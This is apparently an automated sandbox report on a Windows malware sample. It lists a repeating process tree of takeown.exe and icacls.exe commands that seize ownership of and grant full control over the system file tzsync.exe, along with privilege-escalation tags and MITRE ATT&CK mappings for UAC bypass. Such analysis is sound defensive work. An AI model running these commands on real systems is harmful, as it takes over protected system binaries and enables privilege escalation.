C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3184
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3192
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3220
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3244
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3272
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:3296
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3332
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3356
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3372
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3404
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3436
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3456
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3500
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3552
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3616
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3680
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3700
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3716
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3736
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3756
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3776
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3896
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3960
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3980
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3996
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4028
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4048
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4072
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:1296
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3096
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3216
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2356
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:1260
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:532
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3564
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:1716
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:1800
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3712
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3728
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1292
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2504
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3596
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4124
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4140
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4176
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4188
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4212
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4252
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4284
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4312
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4328
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4348
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4404
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4428
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4452
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4480
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4504
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4520
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4564
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:4592
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4628
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4676
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4696
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4720
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:4740
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4764
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4796
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4852
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:4904
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4924
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:4944
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4972
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4988
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:5040
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:5108
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2416
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:4208
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1668
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:1740
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1076
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4336
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4228
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1552
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4476
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4588
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:4672
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4732
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:4776
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4812
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2968
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2016
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3008
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:2252
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1696
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:1100
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2832
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:1956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:2896
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:560
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:2672
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4156
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4344
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2852
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-709689283-2055849101949842402-153643571888924940-14996632309847464711979651982"1⤵PID:1616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "137857777010329804201164124771303368724-1644527247-1829017987-1103304711-1019436764"1⤵PID:1232
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-264548951-1711996520-1404011878-1147037927948178777120704736150478956-2091202261"1⤵PID:1548
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2004662112512727622-1108871614-435588241849605340-2128894296-257231209-1626178805"1⤵PID:1168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1681973262-596833653888554449-1089427848-1693696823141320108215669703911628168038"1⤵PID:2720
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1445128247168385105365985226-1591265051216921449-561846817-2047314024-756471313"1⤵PID:2892
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1882711474-299074114-847160533-216827202-912708457193418439918957712332026437265"1⤵PID:1068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1215622477-36191993818566640142147348826-443317336970560604-810888011895510853"1⤵PID:796
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism: 1
Bypass User Account Control: 1
Event Triggered Execution: 1
Change Default File Association: 1
Downloads